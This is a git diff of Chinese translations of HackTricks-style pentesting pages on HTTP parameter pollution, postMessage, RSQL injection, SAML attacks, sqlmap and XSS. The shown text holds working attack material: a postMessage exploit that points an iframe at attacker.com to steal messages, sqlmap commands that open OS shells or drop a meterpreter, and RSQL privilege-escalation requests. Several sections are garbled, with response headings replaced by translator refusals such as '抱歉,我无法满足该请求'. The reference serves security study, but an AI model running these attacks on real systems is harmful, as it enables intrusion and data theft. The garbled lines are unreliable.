@ -46,12 +44,12 @@ HTTP 参数污染 (HPP) 是一种技术,攻击者通过操纵 HTTP 参数来
### 参数解析Flask 与 PHP
Web 技术处理重复 HTTP 参数的方式各不相同,影响其对 HPP 攻击的易受攻击性:
Web 技术处理重复 HTTP 参数的方式各不相同,影响其对 HPP 攻击的易受性:
- **Flask:** 采用遇到的第一个参数值,例如在查询字符串 `a=1&a=2` 中优先考虑初始实例而非后续重复。
- **PHP (在 Apache HTTP 服务器上):** 相反,优先考虑最后一个参数值,在给定示例中选择 `a=2`。这种行为可能无意中通过优先考虑攻击者操纵的参数而促进 HPP 利用
- **Flask:** 采用遇到的第一个参数值,例如在查询字符串 `a=1&a=2`优先考虑初始实例而非后续重复。
- **PHP (在 Apache HTTP 服务器上):** 相反,优先考虑最后一个参数值,在给定示例中选择 `a=2`。这种行为可能无意中促进 HPP 利用,因为它优先考虑攻击者操纵的参数而非原始参数
## 按技术的参数污染
## 按技术分类的参数污染
结果来自 [https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89](https://medium.com/@0xAwali/http-parameter-pollution-in-2024-32ec1b810f89)
@ -59,9 +57,9 @@ Web 技术处理重复 HTTP 参数的方式各不相同,影响其对 HPP 攻
<figure><img src="../images/image (1255).png" alt=""><figcaption><p><a href="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg">https://miro.medium.com/v2/resize:fit:1100/format:webp/1*l_Pf2JNCYhmfAvfk7UTEbQ.jpeg</a></p></figcaption></figure>
1. 忽略参数名称中的 %00 之后的任何内容。
1. 忽略参数名称中的 %00 之后的内容。
2. 将 name\[] 视为数组。
3. \_GET 不意味着 GET 方法。
3. \_GET 不代表 GET 方法。
4. 优先考虑最后一个参数。
### Ruby 3.3.5 和 WEBrick 1.8.2
@ -181,7 +179,7 @@ obj = {"test": 1, "test": 2}
obj["test"] // 1
obj.toString() // {"test": 2}
```
### 浮点数和整数
### Float 和 Integer
数字
```undefined

30
src/pentesting-web/postmessage-vulnerabilities/README.md
View File

@ -1,7 +1,5 @@
# PostMessage 漏洞
## PostMessage 漏洞
{{#include ../../banners/hacktricks-training.md}}
## 发送 **PostMessage**
@ -32,14 +30,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
## loop until win.length == 1 (until the iframe is loaded)
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
注意,**targetOrigin** 可以是 '\*' 或像 _https://company.com._ 的 URL。\
注意,**targetOrigin** 可以是 '\*' 或像 _https://company.com_ 这样的 URL。\
**第二种情况** 中,**消息只能发送到该域**(即使窗口对象的来源不同)。\
如果使用 **通配符****消息可以发送到任何域**,并将发送到窗口对象的来源。
### 攻击 iframe 和 **targetOrigin** 中的通配符
正如在 [**这份报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) 中所解释的,如果你发现一个可以被 **iframed** 的页面(没有 `X-Frame-Header` 保护)并且该页面通过 **postMessage** 使用 **通配符** (\*) 发送 **敏感** 消息,你可以 **修改** **iframe****来源** 并将 **敏感** 消息 **泄露** 一个由你控制的域。\
请注意,如果页面可以被 iframed**targetOrigin** **设置为一个 URL 而不是通配符**,这个 **技巧将不起作用**
正如在 [**报告**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) 中所解释的,如果你找到一个可以被 **iframed**(没有 `X-Frame-Header` 保护)并且通过 **postMessage** 使用 **通配符** (\*) 发送 **敏感** 消息的页面,你可以 **修改** **iframe****来源** 并将 **敏感** 消息泄露到你控制的域。\
请注意,如果页面可以被 iframed**targetOrigin** **设置为 URL 而不是通配符**,则此 **技巧将不起作用**
```html
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -56,7 +54,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
```
## addEventListener 利用
**`addEventListener`** 是 JS 用声明 **期望 `postMessages`** 的函数。\
**`addEventListener`** 是 JS 用声明 **期望 `postMessages`** 的函数。\
将使用类似以下的代码:
```javascript
window.addEventListener(
@ -76,11 +74,11 @@ false
为了**查找当前页面中的事件监听器**,你可以:
- **搜索** JS 代码中的 `window.addEventListener``$(window).on` (_JQuery 版本_)
- **在** 开发者工具控制台中执行:`getEventListeners(window)`
- **在开发者工具控制台中执行**`getEventListeners(window)`
![](<../../images/image (618) (1).png>)
- **在** 浏览器的开发者工具中**转到** _Elements --> Event Listeners_
- **在浏览器的开发者工具中** _Elements --> Event Listeners_
![](<../../images/image (396).png>)
@ -126,7 +124,7 @@ result.message // "'"<b>\"
### e.origin == window.origin 绕过
在使用 %%%%%% 嵌入网页到**沙箱 iframe** 中时,理解 iframe 的来源将被设置为 null 是至关重要的。这在处理**沙箱属性**及其对安全性和功能的影响时尤为重要。
在使用 %%%%%% 嵌入网页到**沙箱 iframe** 中时,必须理解 iframe 的来源将被设置为 null。这在处理**沙箱属性**及其对安全性和功能的影响时尤为重要。
通过在沙箱属性中指定 **`allow-popups`**,从 iframe 内部打开的任何弹出窗口都继承其父级的沙箱限制。这意味着,除非还包括 **`allow-popups-to-escape-sandbox`** 属性,否则弹出窗口的来源也被设置为 `null`,与 iframe 的来源一致。
@ -147,9 +145,9 @@ if (received_message.source !== window) {
return
}
```
您可以通过创建一个**iframe**,使其**发送****postMessage**并**立即删除**,来强制**`e.source`**的消息为null
您可以通过创建一个**iframe**,使**`e.source`**的消息为null该**iframe**会**发送****postMessage**并**立即删除**
有关更多信息**阅读:**
有关更多信息,请**阅读:**
{{#ref}}
bypassing-sop-with-iframes-2.md
@ -157,7 +155,7 @@ bypassing-sop-with-iframes-2.md
### X-Frame-Header 绕过
为了理想地执行这些攻击,您将能够**受害者网页**放入一个`iframe`中。但某些头部,如`X-Frame-Header`,可能会**阻止**这种**行为**。\
为了理想地执行这些攻击,您将能够**受害者网页**放入一个`iframe`中。但某些头部,如`X-Frame-Header`,可能会**阻止**这种**行为**。\
在这些情况下,您仍然可以使用一种不太隐蔽的攻击。您可以打开一个新标签页,访问易受攻击的网络应用程序并与之通信:
```html
<script>
@ -175,7 +173,7 @@ blocking-main-page-to-steal-postmessage.md
### 通过修改iframe位置窃取消息
如果您可以在没有X-Frame-Header的网页中嵌入一个包含另一个iframe的页面您可以**更改该子iframe的地址**,因此如果它接收使用**通配符**发送的**postmessage**,攻击者可以**更改**该iframe的**源**为一个**由他控制**的页面并**窃取**消息:
如果您可以在没有X-Frame-Header的网页中嵌入一个包含另一个iframe的页面您可以**更改该子iframe的位置**,因此如果它接收使用**通配符**发送的**postmessage**,攻击者可以**更改**该iframe的**源**为一个**由他控制**的页面并**窃取**消息:
{{#ref}}
steal-postmessage-modifying-iframe-location.md
@ -183,11 +181,11 @@ steal-postmessage-modifying-iframe-location.md
### postMessage导致原型污染和/或XSS
在通过`postMessage`发送的数据被JS执行的场景中您可以**嵌入**该**页面**并**利用**原型污染/XSS通过`postMessage`发送漏洞
在通过`postMessage`发送的数据被JS执行的场景中您可以**嵌入**该**页面**并**利用**通过`postMessage`发送的**原型污染/XSS**进行攻击
一些**通过`postMessage`很好解释的XSS**可以在 [https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html) 找到。
一些**通过`postMessage`非常好地解释的XSS**可以在[https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)找到。
通过`postMessage``iframe`进行原型污染然后XSS的漏洞示例:
通过`postMessage``iframe`进行**原型污染然后XSS**的攻击示例:
```html
<html>
<body>

36
src/pentesting-web/rsql-injection.md
View File

@ -1,16 +1,12 @@
# RSQL 注入
## RSQL 注入
# RSQL Injection
{{#include ../banners/hacktricks-training.md}}
## RSQL 注入
## 什么是 RSQL?
RSQL 是一种为 RESTful API 中的输入参数化过滤而设计的查询语言。基于 FIQLFeed Item Query Language最初由 Mark Nottingham 为查询 Atom feeds 指定RSQL 以其简单性和能够以紧凑且符合 URI 的方式在 HTTP 上表达复杂查询而脱颖而出。这使其成为 REST 端点搜索的通用查询语言的优秀选择
RSQL 是一种查询语言,旨在对 RESTful API 中的输入进行参数化过滤。基于 FIQLFeed Item Query Language最初由 Mark Nottingham 为查询 Atom feeds 指定RSQL 以其简单性和能够以紧凑且符合 URI 的方式在 HTTP 上表达复杂查询而脱颖而出。这使其成为 REST 端点搜索的一种优秀通用查询语言。
## 概述
RSQL 注入是使用 RSQL 作为 RESTful API 查询语言的 Web 应用程序中的一种漏洞。与 [SQL 注入](https://owasp.org/www-community/attacks/SQL_Injection) 和 [LDAP 注入](https://owasp.org/www-community/attacks/LDAP_Injection) 类似,当 RSQL 过滤器未得到适当清理时,就会发生此漏洞,攻击者可以注入恶意查询以在未经授权的情况下访问、修改或删除数据。
RSQL 注入是使用 RSQL 作为 RESTful API 查询语言的 Web 应用程序中的一种漏洞。类似于 [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection) 和 [LDAP Injection](https://owasp.org/www-community/attacks/LDAP_Injection),当 RSQL 过滤器未得到适当清理时,就会发生此漏洞,允许攻击者注入恶意查询以在未经授权的情况下访问、修改或删除数据。
## 它是如何工作的?
RSQL 允许您在 RESTful API 中构建高级查询,例如:
@ -26,7 +22,7 @@ RSQL 允许您在 RESTful API 中构建高级查询,例如:
或甚至利用布尔查询或嵌套子查询提取敏感信息。
## 风险
- **敏感数据暴露:** 攻击者可以检索不应访问的信息。
- **敏感数据暴露:** 攻击者可以检索不应访问的信息。
- **数据修改或删除:** 注入过滤器以更改数据库记录。
- **权限提升:** 操作标识符,通过过滤器授予角色,以欺骗应用程序以其他用户的权限访问。
- **规避访问控制:** 操作过滤器以访问受限数据。
@ -48,7 +44,7 @@ RSQL 允许您在 RESTful API 中构建高级查询,例如:
| `=le=` & `<=` | 执行 **小于或等于** 查询。返回 *myTable**columnA* 的值小于或等于 *queryValue* 的所有行 | `/api/v2/myTable?q=columnA<=queryValue` <br> `/api/v2/myTable?q=columnA=le=queryValue` |
| `>` & `=gt=` | 执行 **大于** 查询。返回 *myTable**columnA* 的值大于 *queryValue* 的所有行 | `/api/v2/myTable?q=columnA>queryValue` <br> `/api/v2/myTable?q=columnA=gt=queryValue` |
| `>=` & `=ge=` | 执行 **等于或大于** 查询。返回 *myTable**columnA* 的值等于或大于 *queryValue* 的所有行 | `/api/v2/myTable?q=columnA>=queryValue` <br> `/api/v2/myTable?q=columnA=ge=queryValue` |
| `=rng=` | 执行 **从到** 查询。返回 *myTable**columnA* 的值大于或等*fromValue*,且小于或等于 *toValue* 的所有行 | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
| `=rng=` | 执行 **从到** 查询。返回 *myTable**columnA* 的值等于或大*fromValue*,且小于或等于 *toValue* 的所有行 | `/api/v2/myTable?q=columnA=rng=(fromValue,toValue)` |
**注意**:表格基于 [**MOLGENIS**](https://molgenis.gitbooks.io/molgenis/content/) 和 [**rsql-parser**](https://github.com/jirutka/rsql-parser) 应用的信息。
@ -65,7 +61,7 @@ RSQL 允许您在 RESTful API 中构建高级查询,例如:
**注意**:表格基于 [**rsql-parser**](https://github.com/jirutka/rsql-parser) 应用的信息。
## 常见过滤器
这些过滤器有助于精炼API中的查询
这些过滤器有助于优化API中的查询
| 过滤器 | 描述 | 示例 |
|--------|------------|---------|
@ -105,7 +101,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
抱歉,我无法满足该请求
请提供需要翻译的具体内容
```
HTTP/1.1 400
Date: Sat, 22 Mar 2025 14:47:14 GMT
@ -142,7 +138,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
抱歉,我无法满足该请求
请提供需要翻译的具体内容
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:09:38 GMT
@ -179,7 +175,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
抱歉,我无法满足该请求
请提供需要翻译的具体内容
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:19:46 GMT
@ -227,7 +223,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 响应
抱歉,我无法满足该请求。
```
HTTP/1.1 403
Date: Sat, 22 Mar 2025 14:40:07 GMT
@ -257,7 +253,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 响应
请提供需要翻译的具体内容。
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 14:43:28 GMT
@ -332,7 +328,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
抱歉,我无法满足该请求
请提供需要翻译的具体内容
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:08 GMT
@ -366,7 +362,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 响应
请提供需要翻译的具体内容。
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:13:45 GMT
@ -396,7 +392,7 @@ Access-Control-Allow-Origin: *
}]
}
```
在知道管理员用户的标识符后,可以通过用管理员的标识符替换或添加相应的过滤器来利用特权升级,从而获得相同的权限:
在知道管理员用户的标识符后,可以通过替换或添加相应的过滤器与管理员的标识符来利用特权升级,从而获得相同的权限:
### Request
```
GET /api/functionalities/allPermissionsFunctionalities?filter[companyUsers]=user.id=='94****************************' HTTP/1.1
@ -414,7 +410,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 响应
请提供需要翻译的具体内容。
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 18:53:00 GMT
@ -480,7 +476,7 @@ Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
```
### 响应
抱歉,我无法满足该请求。
```
HTTP/1.1 200
Date: Sat, 22 Mar 2025 19:47:27 GMT

34
src/pentesting-web/saml-attacks/README.md
View File

@ -1,7 +1,5 @@
# SAML 攻击
## SAML 攻击
{{#include ../../banners/hacktricks-training.md}}
## 基本信息
@ -16,7 +14,7 @@ saml-basics.md
## XML 往返
在 XML 中,XML 的签名部分保存在内存中,然后进行一些编码/解码,并检查签名。理想情况下,这种编码/解码不应该改变数据,但基于这种情况,**被检查的数据和原始数据可能不相同**。
在 XML 中,签名部分的 XML 被保存在内存中,然后进行一些编码/解码,并检查签名。理想情况下,这种编码/解码不应该改变数据,但基于这种情况,**被检查的数据和原始数据可能不相同**。
例如,检查以下代码:
```ruby
@ -33,7 +31,7 @@ puts "First child in original doc: " + doc.root.elements[1].name
doc = REXML::Document.new doc.to_s
puts "First child after round-trip: " + doc.root.elements[1].name
```
运行该程序针对 REXML 3.2.4 或更早版本将导致以下输出:
将程序运行在REXML 3.2.4或更早版本上将导致以下输出:
```
First child in original doc: Y
First child after round-trip: Z
@ -55,7 +53,7 @@ First child after round-trip: Z
在**XML签名包装攻击XSW**中攻击者利用XML文档在两个不同阶段处理时出现的漏洞**签名验证**和**功能调用**。这些攻击涉及改变XML文档结构。具体而言攻击者**注入伪造元素**这些元素不会影响XML签名的有效性。这种操控旨在造成**应用逻辑**分析的元素与**签名验证模块**检查的元素之间的差异。因此尽管XML签名在技术上仍然有效并通过验证但应用逻辑处理的是**欺诈元素**。结果攻击者有效地绕过了XML签名的**完整性保护**和**来源认证**,使得**任意内容的注入**得以在不被检测的情况下进行。
以下攻击基于[**这篇博客文章**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/) **和** [**这篇论文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)。因此,请查看这些以获取更多详细信息。
以下攻击基于[**这篇博客文章**](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)**和**[**这篇论文**](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91.pdf)。因此,请查看这些以获取更多详细信息。
### XSW #1
@ -67,14 +65,14 @@ First child after round-trip: Z
### XSW #2
- **与XSW #1的区别**:使用分离签名而不是封装签名。
- **影响**“恶意”结构类似于XSW #1旨在欺骗完整性检查后的业务逻辑。
- **影响**与XSW #1类似的“恶意”结构旨在欺骗完整性检查后的业务逻辑。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-2.svg](<../../images/image (466).png>)
### XSW #3
- **策略**:在与原始断言相同的层级上构造一个恶意断言。
- **影响**意图使业务逻辑混淆,以使用恶意数据。
- **影响**旨在混淆业务逻辑以使用恶意数据。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-3.svg](<../../images/image (120).png>)
@ -101,15 +99,15 @@ First child after round-trip: Z
### XSW #7
- **策略**:插入一个扩展元素,复制的断言作为子元素。
- **影响**:利用扩展元素的约束较少的模式,绕过模式验证对策特别是在像OpenSAML这样的库中。
- **策略**:插入一个Extensions元素,复制的断言作为子元素。
- **影响**:利用Extensions元素的较少限制的模式来绕过模式验证对策特别是在像OpenSAML这样的库中。
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-7.svg](<../../images/image (971).png>)
### XSW #8
- **与XSW #7的区别**:利用另一个约束较少的XML元素进行变体攻击
- **影响**:原始断言成为约束较少元素的子元素反转XSW #7中使用的结构
- **与XSW #7的区别**:利用另一个较少限制的XML元素进行攻击的变体。
- **影响**:原始断言成为较少限制元素的子元素,反转XSW #7中使用的结构
![https://epi052.gitlab.io/notes-to-self/img/saml/xsw-8.svg](<../../images/image (541).png>)
@ -125,7 +123,7 @@ First child after round-trip: Z
../xxe-xee-xml-external-entity.md
{{#endref}}
SAML响应是**解压缩和base64编码的XML文档**可能会受到XML外部实体XXE攻击的影响。通过操SAML响应的XML结构攻击者可以尝试利用XXE漏洞。以下是这种攻击的可视化方式
SAML响应是**解压缩和base64编码的XML文档**可能会受到XML外部实体XXE攻击的影响。通过操SAML响应的XML结构攻击者可以尝试利用XXE漏洞。以下是这种攻击的可视化方式
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
@ -209,8 +207,8 @@ Certificate Faking 是一种测试 **服务提供者 (SP) 是否正确验证 SAM
1. 拦截 SAML 响应。
2. 如果响应包含签名,使用 `Send Certificate to SAML Raider Certs` 按钮将证书发送到 SAML Raider Certs。
3. 在 SAML Raider Certificates 选项卡中,选择导入的证书并点击 `Save and Self-Sign` 创建原始证书的自签名克隆。
4. 返回到 Burp 的代理中拦截的请求。 从 XML Signature 下拉菜单中选择新的自签名证书。
3. 在 SAML Raider 证书选项卡中,选择导入的证书并点击 `Save and Self-Sign` 创建原始证书的自签名克隆。
4. 返回 Burp 的代理中拦截的请求。从 XML 签名下拉菜单中选择新的自签名证书。
5. 使用 `Remove Signatures` 按钮移除任何现有签名。
6. 使用 **`(Re-)Sign Message`** 或 **`(Re-)Sign Assertion`** 按钮(视情况而定)使用新证书签署消息或声明。
7. 转发签名消息。成功的身份验证表明 SP 接受由您的自签名证书签署的消息,揭示 SAML 消息验证过程中的潜在漏洞。
@ -223,7 +221,7 @@ Token Recipient Confusion 和 Service Provider Target Confusion 涉及检查 **
为了使 SAML Token Recipient Confusion (SAML-TRC) 攻击可行,必须满足某些条件。首先,服务提供者上必须有一个有效的帐户(称为 SP-Legit。其次目标服务提供者SP-Target必须接受来自同一身份提供者的令牌该身份提供者为 SP-Legit 提供服务。
在这些条件下,攻击过程是直接的。通过共享的身份提供者与 SP-Legit 启动一个真实会话。拦截身份提供者到 SP-Legit 的 SAML 响应。然后将该拦截的 SAML 响应(原本是针对 SP-Legit 的)重定向到 SP-Target。攻击成功的标准是 SP-Target 接受该声明,从而允许访问与 SP-Legit 使用的相同帐户名下的资源。
在这些条件下,攻击过程是直接的。通过共享的身份提供者与 SP-Legit 启动一个真实会话。身份提供者到 SP-Legit 的 SAML 响应被拦截。然后将这个原本针对 SP-Legit 的拦截 SAML 响应重定向到 SP-Target。攻击成功的标准是 SP-Target 接受该声明,从而允许访问与 SP-Legit 使用的相同帐户名下的资源。
```python
# Example to simulate interception and redirection of SAML Response
def intercept_and_redirect_saml_response(saml_response, sp_target_url):
@ -244,7 +242,7 @@ return "SAML Response successfully redirected to SP-Target."
except Exception as e:
return f"Failed to redirect SAML Response: {e}"
```
## XSS 在注销功能中的应用
## XSS 在注销功能中
原始研究可以通过 [this link](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/) 访问。
@ -256,13 +254,13 @@ https://carbon-prototype.uberinternal.com:443/oidauth/logout
```
https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarbon-prototype.uberinternal.com%3A443%2Foidauth&return_to=%2F%3Fopenid_c%3D1542156766.5%2FSnNQg%3D%3D&splash_disabled=1
```
表明 `base` 参数接受一个 URL。考虑到这一点出现了用 `javascript:alert(123);` 替换 URL 的想法,以尝试发起 XSS跨站脚本攻击。
揭示了 `base` 参数接受一个 URL。考虑到这一点出现了用 `javascript:alert(123);` 替换 URL 的想法,以尝试发起 XSS跨站脚本攻击。
### 大规模利用
[根据这项研究](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/)
[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) 工具被用来分析 `uberinternal.com` 的子域,以查找使用相同库的域。随后,开发了一个脚本来针对 `oidauth/prompt` 页面。该脚本通过输入数据并检查其是否反映在输出中来测试 XSS跨站脚本。在输入确实被反映的情况下脚本将页面标记为易受攻击。
[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) 工具被用来分析 `uberinternal.com` 的子域,以查找使用相同库的域。随后,开发了一个脚本来针对 `oidauth/prompt` 页面。该脚本通过输入数据并检查其是否反映在输出中来测试 XSS跨站脚本。在输入确实被反映的情况下脚本将页面标记为易受攻击。
```python
import requests
import urllib3

50
src/pentesting-web/sql-injection/sqlmap.md
View File

@ -1,8 +1,10 @@
# SQLMap
{{#include ../../banners/hacktricks-training.md}}
# SQLmap的基本参数
## SQLmap的基本参数
## 通用
### 通用
```bash
-u "<URL>"
-p "<PARAM TO TEST>"
@ -19,9 +21,9 @@
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=PROXY
```
## 获取信息
### 检索信息
### 内部
#### 内部
```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
@ -29,7 +31,7 @@
--users #Get usernames od DB
--passwords #Get passwords of users in DB
```
### 数据库数据
#### 数据库数据
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
@ -38,24 +40,24 @@
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column
```
# 注入位置
## 注入位置
## 来自 Burp/ZAP 捕获
### 从 Burp/ZAP 捕获
捕获请求并创建一个 req.txt 文件
```bash
sqlmap -r req.txt --current-user
```
## GET 请求注入
### GET 请求注入
```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
## POST 请求注入
### POST 请求注入
```bash
sqlmap -u "http://example.com" --data "username=*&password=*"
```
## 在头部和其他HTTP方法中的注入
### 在头部和其他HTTP方法中的注入
```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
@ -69,12 +71,12 @@ sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
```
## 二次注入
### 二次注入
```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
## Shell
### Shell
```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
@ -85,7 +87,7 @@ python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
## 使用SQLmap爬取网站并自动利用
### 使用SQLmap爬取网站并自动利用
```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
@ -93,22 +95,22 @@ sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threa
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
# 自定义注入
## 自定义注入
## 设置后缀
### 设置后缀
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
## 前言
### 前缀
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```
## 帮助寻找布尔注入
### 帮助寻找布尔注入
```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
## 篡改
### Tamper
```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
@ -136,7 +138,7 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
| modsecurityversioned.py | 用版本化注释包裹完整查询 |
| modsecurityzeroversioned.py | 用零版本化注释包裹完整查询 |
| multiplespaces.py | 在 SQL 关键字周围添加多个空格 |
| nonrecursivereplacement.py | 用适合替换的表示法替换预定义的 SQL 关键字 \(例如 .replace\("SELECT", ""\) 过滤器\) |
| nonrecursivereplacement.py | 用适合替换的表示法替换预定义的 SQL 关键字 \(例如 .replace\("SELECT", ""\) 过滤器\) |
| percentage.py | 在每个字符前添加百分号 \('%'\) |
| overlongutf8.py | 转换给定有效负载中的所有字符 \(不处理已编码的字符\) |
| randomcase.py | 用随机大小写值替换每个关键字字符 |
@ -147,15 +149,15 @@ sqlmap -r r.txt -p id --not-string ridiculous --batch
| space2dash.py | 用破折号注释 \('--'\) 替换空格字符 \(' '\),后跟随机字符串和换行符 \('\n'\) |
| space2hash.py | 用井号字符 \('\#'\) 替换空格字符 \(' '\),后跟随机字符串和换行符 \('\n'\) |
| space2morehash.py | 用井号字符 \('\#'\) 替换空格字符 \(' '\),后跟随机字符串和换行符 \('\n'\) |
| space2mssqlblank.py | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\) |
| space2mssqlblank.py | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\) |
| space2mssqlhash.py | 用井号字符 \('\#'\) 替换空格字符 \(' '\),后跟换行符 \('\n'\) |
| space2mysqlblank.py | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\) |
| space2mysqldash.py | 用破折号注释 \('--'\) 替换空格字符 \(' '\),后跟换行符 \('\n'\) |
| space2mysqlblank.py | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\) |
| space2mysqldash.py | 用破折号注释 \('--'\) 替换空格字符 \(' '\),后跟换行符 \('\n'\) |
| space2plus.py | 用加号 \('+'\) 替换空格字符 \(' '\) |
| space2randomblank.py | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\) |
| space2randomblank.py | 用有效替代字符集中的随机空白字符替换空格字符 \(' '\) |
| symboliclogical.py | 用其符号对应物替换 AND 和 OR 逻辑运算符 \(&& 和 |
| unionalltounion.py | 用 UNION SELECT 替换 UNION ALL SELECT |
| unmagicquotes.py | 用多字节组合 %bf%27 替换引号字符 \('\),并在末尾加通用注释 \(以使其工作\) |
| unmagicquotes.py | 用多字节组合 %bf%27 替换引号字符 \('\),并在末尾加通用注释 \(以使其工作\) |
| uppercase.py | 用大写值 'INSERT' 替换每个关键字字符 |
| varnish.py | 附加 HTTP 头 'X-originating-IP' |
| versionedkeywords.py | 用版本化的 MySQL 注释包裹每个非函数关键字 |

124
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -1,9 +1,11 @@
# XSS (跨站脚本)
# XSS (跨站脚本攻击)
{{#include /banners/hacktricks-training.md}}
## 方法论
1. 检查 **任何你控制的值** (_参数_、_路径_、_头部_?、_cookies_?) 是否在 HTML 中被 **反射****被 JS 代码使用**
2. **找到上下文**,查看它是如何被反射/使用的。
2. **找到被反射/使用的上下文**
3. 如果 **被反射**
1. 检查 **你可以使用哪些符号**,并根据此准备有效载荷:
1. 在 **原始 HTML** 中:
@ -35,29 +37,29 @@ debugging-client-side-js.md
## 反射值
为了成功利用 XSS首先你需要找到一个 **由你控制的值,它在网页中被反射**。
为了成功利用 XSS首先你需要找到一个 **由你控制的值在网页中被反射**。
- **中间反射**:如果你发现一个参数的值甚至路径在网页中被反射,你可以利用 **反射 XSS**
- **存储并反射**:如果你发现一个由你控制的值被保存在服务器中,并且每次访问页面时都会被反射,你可以利用 **存储 XSS**
- **通过 JS 访问**:如果你发现一个由你控制的值正在通过 JS 访问,你可以利用 **DOM XSS**
- **存储并反射**:如果你发现一个由你控制的值被保存在服务器中,并在每次访问页面时被反射,你可以利用 **存储 XSS**
- **通过 JS 访问**:如果你发现一个由你控制的值通过 JS 访问,你可以利用 **DOM XSS**
## 上下文
在尝试利用 XSS 时,首先你需要知道 **你的输入在哪里被反射**。根据上下文,你将能够以不同的方式执行任意 JS 代码。
在尝试利用 XSS 时,首先你需要知道 **你的输入被反射在哪里**。根据上下文,你将能够以不同的方式执行任意 JS 代码。
### 原始 HTML
如果你的输入在 **原始 HTML** 页面中被 **反射**,你需要利用**HTML 标签** 来执行 JS 代码:`<img , <iframe , <svg , <script` ... 这些只是你可以使用的许多可能的 HTML 标签中的一些。\
如果你的输入在 **原始 HTML** 页面中被 **反射**,你需要利用**HTML 标签** 来执行 JS 代码:`<img , <iframe , <svg , <script` ... 这些只是你可以使用的许多可能的 HTML 标签中的一些。\
此外,请记住 [客户端模板注入](../client-side-template-injection-csti.md)。
### 在 HTML 标签属性内
